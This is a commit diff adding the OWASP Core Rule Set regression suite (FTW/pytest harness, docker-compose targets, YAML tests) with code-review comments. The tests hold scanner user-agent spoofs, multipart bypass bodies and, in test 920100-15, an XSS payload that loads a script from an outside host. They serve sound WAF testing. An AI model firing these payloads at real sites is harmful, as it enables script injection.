bunkerweb 1.4.0

bunkerity
2022-06-03 17:24:14 +02:00
parent 3a078326c5
commit a9f886804a
5245 changed files with 1432051 additions and 27894 deletions


@@ -0,0 +1,41 @@
version: '3.1'
# Only one of these will be up at a time for now.
# Concurrency will be on the tests folder we have.
services:
modsec2-apache:
image: owasp/modsecurity-crs:v3.2-modsec2-apache
environment:
- SERVERNAME=modsec2-apache
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec2-apache:/var/log/apache2
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"
modsec3-apache:
image: owasp/modsecurity-crs:v3.2-modsec3-apache
environment:
- SERVERNAME=modsec3-apache
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec3-apache:/var/log/apache2
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"
modsec3-nginx:
image: owasp/modsecurity-crs:v3.2-modsec3-nginx
environment:
- SERVERNAME=modsec3-nginx
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec3-nginx:/var/log/nginx
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"
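Review bot: All three services publish `"80:80"`, which binds the DetectionOnly WAF containers on every interface of the runner although the regression tests in this commit only address `127.0.0.1`; `- "127.0.0.1:80:80"` would keep the test targets off the network. The rules mount could also be read-only, `- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules:ro`, since the container presumably only needs to load the rules. `PARANOIA=5` is higher than the `tx.paranoia_level=4` shown in the README added by the same commit, so one of the two values wants a comment or a correction. The images are referenced by tag only; pinning them by digest would make the test target reproducible.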


@@ -0,0 +1 @@
pytest>=2.9.1


@@ -0,0 +1,64 @@
from ftw import ruleset, logchecker, testrunner
import datetime
import pytest
import sys
import re
import os
def test_crs(ruleset, test, logchecker_obj):
runner = testrunner.TestRunner()
for stage in test.stages:
runner.run_stage(stage, logchecker_obj)
class FooLogChecker(logchecker.LogChecker):
def __init__(self, config):
super(FooLogChecker, self).__init__()
self.log_location = config['log_location_linux']
self.log_date_regex = config['log_date_regex']
self.log_date_format = config['log_date_format']
def reverse_readline(self, filename):
with open(filename) as f:
f.seek(0, os.SEEK_END)
position = f.tell()
line = ''
while position >= 0:
f.seek(position)
next_char = f.read(1)
if next_char == "\n":
yield line[::-1]
line = ''
else:
line += next_char
position -= 1
yield line[::-1]
def get_logs(self):
pattern = re.compile(r'%s' % self.log_date_regex)
our_logs = []
for lline in self.reverse_readline(self.log_location):
# Extract dates from each line
match = re.match(pattern, lline)
if match:
log_date = match.group(1)
log_date = datetime.datetime.strptime(
log_date, self.log_date_format)
# NGINX doesn't give us microsecond level by detail, round down.
if "%f" not in self.log_date_format:
ftw_start = self.start.replace(microsecond=0)
else:
ftw_start = self.start
ftw_end = self.end
if log_date <= ftw_end and log_date >= ftw_start:
our_logs.append(lline)
# If our log is from before FTW started stop
if log_date < ftw_start:
break
return our_logs
@pytest.fixture(scope='session')
def logchecker_obj(config):
return FooLogChecker(config)
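Review bot: `reverse_readline` opens the log in text mode and then seeks to arbitrary offsets, reading one character at a time. On Python 3 a seek that lands inside a multi-byte sequence can raise `UnicodeDecodeError`, and the error log being read echoes request data sent by the tests, so non-ASCII bytes are plausible. Opening with `with open(filename, 'rb') as f:` and decoding each completed line with `errors='replace'` would avoid that; the `"\n"` comparison and the `line = ''` initialisers would then have to be bytes. Separately, `get_logs` compares naive datetimes, which is presumably the source of the timezone caveat in the README, and a short docstring saying so would help.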


@@ -0,0 +1,63 @@
owasp-crs-regressions
=====================
Introduction
============
Welcome to the OWASP Core Rule Set regression testing suite. This suite is meant to test specific rules in OWASP CRS version 3. The suite is designed to uses preconfigured IDs that are specific to this version of CRS. The tests themselves can be run without CRS and one would expect the same elements to be blocked, however one must override the default Output parameter in the tests.
Installation
============
The OWASP Core Rule Set project was part of the effort to develop FTW, the Framework for Testing WAFs. As a result, we use this project in order to run our regression testing. FTW is designed to use existing Python testing frameworks to allow for easy to read web based testing, provided in YAML. You can install FTW by from the repository (at https://github.com/CRS-support/ftw) or by running pip.
```pip install -r requirements.txt```
This will install FTW as a library. It can also be run natively, see the FTW documentation for more detail.
Requirements
============
There are Three requirements for running the OWASP CRS regressions.
1. You must have ModSecurity specify the location of your error.log, this is done in the config.py file
2. ModSecurity must be in DetectionOnly (or anomaly scoring) mode
3. You must disable IP blocking based on previous events
Note: The test suite compares timezones -- if your test machine and your host machine are in different timezones this can cause bad results
To accomplish 2. and 3. you may use the following rule in your setup.conf:
```
SecAction "id:900005,\
phase:1,\
nolog,\
pass,\
ctl:ruleEngine=DetectionOnly,\
ctl:ruleRemoveById=910000,\
setvar:tx.paranoia_level=4,\
setvar:tx.crs_validate_utf8_encoding=1,\
setvar:tx.arg_name_length=100,\
setvar:tx.arg_length=400"
```
Once these requirements have been met the tests can be run by using pytest.
Running The Tests
=================
On Windows this will look like:
-------------------------------
Single Rule File:
```py.test.exe -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test.exe -v CRS_Tests.py --ruledir_recurse=tests/```
On Linux this will look like:
-----------------------------
Single Rule File:
```py.test -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test -v CRS_Tests.py --ruledir_recurse=tests/```
Contributions
=============
We'd like to thank Fastly for their help and support in developing these tests.


@@ -0,0 +1,14 @@
[modsec2-apache]
log_date_format = %a %b %d %H:%M:%S.%f %Y
log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\]
log_location_linux = /var/log/apache2/error.log
[modsec3-apache]
log_date_format = %a %b %d %H:%M:%S.%f %Y
log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\]
log_location_linux = /var/log/apache2/error.log
[modsec3-nginx]
log_date_format = %Y/%m/%d %H:%M:%S
log_date_regex = (\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2})
log_location_linux = /var/log/nginx/error.log
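Review bot: `[A-z]` in the two Apache `log_date_regex` values (the modsec2-apache and modsec3-apache sections) is not a letter class, because the range A–z also covers `[`, `\`, `]`, `^`, `_` and the backtick. The month abbreviation should be matched with `[A-Z][a-z]{2}`, as the weekday before it already is. A malformed line would most likely fail later in `strptime` rather than yield a wrong date, so the impact looks limited, but the class is not what was intended.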


@@ -0,0 +1,17 @@
try:
import ConfigParser as configparser
except ImportError:
import configparser
import os
import pytest
def pytest_addoption(parser):
parser.addoption('--config', action='store', default='modsec2-apache')
@pytest.fixture(scope='session')
def config(request):
cp = configparser.RawConfigParser()
cp.read(os.path.join(os.path.dirname(__file__), 'config.ini'))
return dict(cp.items(request.config.getoption('--config')))
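Review bot: `cp.read()` silently skips a file it cannot open, so a missing `config.ini` surfaces as a `NoSectionError` for the selected section rather than as a missing file. Checking the return value, for example `if not cp.read(path): raise IOError(path)`, would make the failure obvious. The `--config` option also has no `help=` text; `help='section of config.ini describing the target (log path and date format)'` would document that the value is a section name.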


@@ -0,0 +1 @@
ftw==1.1.7


@@ -0,0 +1,149 @@
---
meta:
author: "csanders-git"
enabled: true
name: "911100.yaml"
description: "Description"
tests:
-
test_title: 911100-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "TEST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"911100\""
-
test_title: 911100-6
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: DELETE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
-
test_title: 911100-7
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: FOO
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
-
test_title: 911100-8
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: SUBSCRIBE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
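Review bot: The `User-Agent` in tests 911100-6 to 911100-8 ends at `rv` with no closing parenthesis, which looks like a value cut at a colon when the old regressions were converted. The same truncated string appears in the 920100, 920120, 920160, 920170, 920180 and 920190 files of this commit, and 920120 also carries `Referer: http`. These tests target the method or a specific header, so the outcome is probably unaffected, but the requests no longer resemble the traffic they were taken from. Restoring the full values in quotes, or using `User-Agent: "ModSecurity CRS 3 Tests"` as tests 911100-1 to 911100-5 do, would be cleaner. `description: "Description"` in `meta` is a placeholder as well.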


@@ -0,0 +1,94 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913100.yaml
tests:
-
test_title: 913100-1
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727) Havij
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-2
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Arachni/0.2.1
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-3
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: w3af.sourceforge.net
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-4
desc: "Scanner identification based on User-agent field"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
User-agent: "nessus"
uri: "/"
output:
log_contains: id "913100"
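Review bot: `description: None` in `meta` is loaded as the string "None", not as an empty value, and the same line is in the 913110 and 913120 files. A real description taken from the test titles, such as `description: "Request Indicates a Security Scanner Scanned the Site (913100)"`, would be more useful than the converter default. Test 913100-4 spells the header `User-agent` while the others use `User-Agent`; if the different casing is deliberate it deserves a comment.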


@@ -0,0 +1,49 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913110.yaml
tests:
-
test_title: 913110-1
desc: Request Indicates a Security Scanner Scanned the Site (913110) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Acunetix-Product: WVS/5.0 (Acunetix Web Vulnerability Scanner - EVALUATION)
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913110"
-
test_title: 913110-2
desc: "Scanner identification based on custom header"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
X-Scanner: "whatever"
uri: "/"
output:
log_contains: id "913110"


@@ -0,0 +1,63 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913120.yaml
tests:
-
test_title: 913120-1
desc: Request Indicates a Security Scanner Scanned the Site (913120) from old modsec
regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727)
method: GET
port: 80
uri: /nessustest
version: HTTP/1.0
output:
log_contains: id "913120"
-
test_title: 913120-2
desc: IBM fingerprint from (http://www-01.ibm.com/support/docview.wss?uid=swg21293132)
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: localhost
uri: /AppScan_fingerprint/MAC_ADDRESS_01234567890.html?9ABCDG1
version: HTTP/1.0
output:
log_contains: id "913120"
-
test_title: 913120-3
desc: "Scanner identification based on uri"
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
Host: "localhost"
version: HTTP/1.0
uri: "/nessus_is_probing_you_"
output:
log_contains: id "913120"


@@ -0,0 +1,287 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920100.yaml"
description: "Tests to trigger, or not trigger 920100"
tests:
-
# Standard GET request
test_title: 920100-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# Request has tab (\t) before request method - Apache complains
# AH00126: Invalid URI in request GET / HTTP/1.1
test_title: 920100-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: " GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
status: 400
-
# Perfectly valid OPTIONS request
test_title: 920100-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "*"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# Valid CONNECT request however this is disabled by Apache default
test_title: 920100-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "1.2.3.4:80"
version: "HTTP/1.1"
output:
status: [405, 403]
-
# invalid Connect request, domains require ports
test_title: 920100-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com"
version: "HTTP/1.1"
output:
status: 400
-
# This is an acceptable CONNECT request for SSL tunneling
test_title: 920100-6
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "CONNECT"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests #FP"
Host: "localhost"
protocol: "http"
uri: "www.cnn.com:80"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
-
# Valid request with query and anchor components
test_title: 920100-7
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# The colon in the path is not allowed. Apache will block by default
# (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file
test_title: 920100-8
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/index.html:80?I=Like&Apples=Today#tag"
version: "HTTP/1.1"
output:
status: [400, 403]
-
# Normal Options request with path
test_title: 920100-9
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "OPTIONS"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
no_log_contains: "id \"920100\""
-
# An invalid method with a long name
test_title: 920100-10
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "REALLYLONGUNREALMETHOD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "/"
version: "HTTP/1.1"
output:
log_contains: "id \"920100\""
-
# An invalid request because a backslash is used in uri
# Apache will end up blocking this before it gets to CRS.
# We will need to support OR output tests to fix this
test_title: 920100-11
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # FN"
Host: "localhost"
protocol: "http"
uri: "\\"
version: "HTTP/1.1"
output:
status: [403, 400]
#log_contains: "id \"920100\""
-
test_title: 920100-12
desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: "\tGET"
port: 80
uri: /
version: HTTP/1.1
output:
status: 400
-
test_title: 920100-13
desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: GET
port: 80
uri: \index.html
version: HTTP\1.0
output:
status: [403, 400]
# log_contains: id "920100"
-
test_title: 920100-14
desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: '|GET'
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "920100"
-
test_title: 920100-15
desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
stages:
-
stage:
input:
dest_addr: 127.0.0.1
method: GET
port: 80
uri: '/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
headers:
User-Agent: ModSecurity CRS 3 Tests
Host: localhost
output:
status: [403, 400]
# log_contains: id "920100"
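Review bot: Tests 920100-11, 920100-13 and 920100-15 have their `log_contains` check commented out and pass on `status: [403, 400]` alone, so they succeed whenever the web server rejects the request and would not notice rule 920100 being removed or broken. The comment on 920100-11 already says OR-style output checks are needed; until then a line such as `desc: "server rejects before CRS runs; rule 920100 not verified"` would stop these from being counted as rule coverage. In 920100-6 the comment calls the CONNECT request acceptable while the test expects `log_contains: "id \"920100\""`, so either the comment or the expectation needs correcting. The `#FP` and `# FN` markers sit inside the `User-Agent` value, where they are sent to the server; a `desc` field is the better place for them.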


@@ -0,0 +1,111 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920120.yaml"
description: "Tests to trigger rule 920120"
tests:
-
test_title: 920120-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Accept: "*/*"
Accept-Language: "en"
Connection: "close"
Referer: "http://localhost/"
Content-Type: "multipart/form-data; boundary=--------397236876"
data:
- "----------397236876"
- "Content-Disposition: form-data; name=\"fileRap\"; filename=\"file=.txt\""
- "Content-Type: text/plain"
- ""
- "555-555-0199@example.com"
- "----------397236876--"
protocol: "http"
output:
log_contains: "id \"920120\""
-
test_title: 920120-2
desc: Attempted multipart/form-data bypass (920120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv
method: POST
port: 80
uri: /cgi-bin/fup.cgi
version: HTTP/1.1
data:
- '-----------------------------627652292512397580456702590'
- 'Content-Disposition: form-data; name="fi=le"; filename="test"'
- 'Content-Type: text/plain'
- ''
- 'email: security@modsecurity.org'
- ''
- '-----------------------------627652292512397580456702590'
- 'Content-Disposition: form-data; name="note"'
- ''
- Contact info.
- '-----------------------------627652292512397580456702590--'
output:
log_contains: id "920120"
-
test_title: 920120-3
desc: Invalid Request Body (920120) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
Referer: http
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.1
data:
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="fi;le"; filename="test"'
- 'Content-Type: application/octet-stream'
- ''
- Rotem & Ayala
- ''
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="name"'
- ''
- tt2
- '-----------------------------265001916915724'
- 'Content-Disposition: form-data; name="B1"'
- ''
- Submit
- '-----------------------------265001916915724--'
output:
log_contains: id "920120"


@@ -0,0 +1,116 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920160.yaml"
description: "Tests to trigger rule 920160"
tests:
-
# Non digit Content-Length without content-type
test_title: 920160-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: 400
-
# Non digit content-length with content-type
test_title: 920160-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "NotDigits"
protocol: "http"
uri: "/"
output:
status: 400
-
# Mixed digit and non digit content length
test_title: 920160-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "123x"
protocol: "http"
uri: "/"
output:
status: 400
-
# Apache auto corrects for this error now so the log should not contain anything
test_title: 920160-4
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: '3'
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: 200
no_log_contains: id "920160"
-
test_title: 920160-5
desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Language: en-us,en;q=0.5
Content-Length: "3;"
Content-Type: application/x-www-form-urlencoded
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: POST
port: 80
uri: /
version: HTTP/1.0
data: abc
output:
status: [200, 403, 400]
# log_contains: id "920160"
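Review bot: Test 920160-5 accepts `status: [200, 403, 400]` with its `log_contains` commented out, which covers success, a WAF block and a server rejection alike, so the test can hardly fail and says nothing about rule 920160. Tests 920160-1 to 920160-3 likewise assert only `status: 400`, which appears to come from the web server rather than from the rule. Where the request does reach ModSecurity, restoring `log_contains: id "920160"` would make these regression tests for the rule again; otherwise a `desc` should state that only server behaviour is checked. The `desc` of 920160-4 says the header is not numeric although the test sends `Content-Length: '3'` and expects no match.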


@@ -0,0 +1,127 @@
---
meta:
author: "csanders-git"
enabled: true
name: "920170.yaml"
description: "A Selection of tests to trigger rule 920170"
tests:
-
# POST Request with data (valid)
test_title: 920170-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
no_log_contains: "id \"920170\""
-
# GET request with data
test_title: 920170-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
-
# Head Request with data
test_title: 920170-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "hi=test"
uri: "/"
output:
log_contains: "id \"920170\""
-
# GET Request but content length is 0 and data is provided
# Weird HTTP 1.0 support bug in Apache, without newline causes 408
test_title: 920170-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "GET"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests # Possibly shouldn't pass"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
Content-Length: "0"
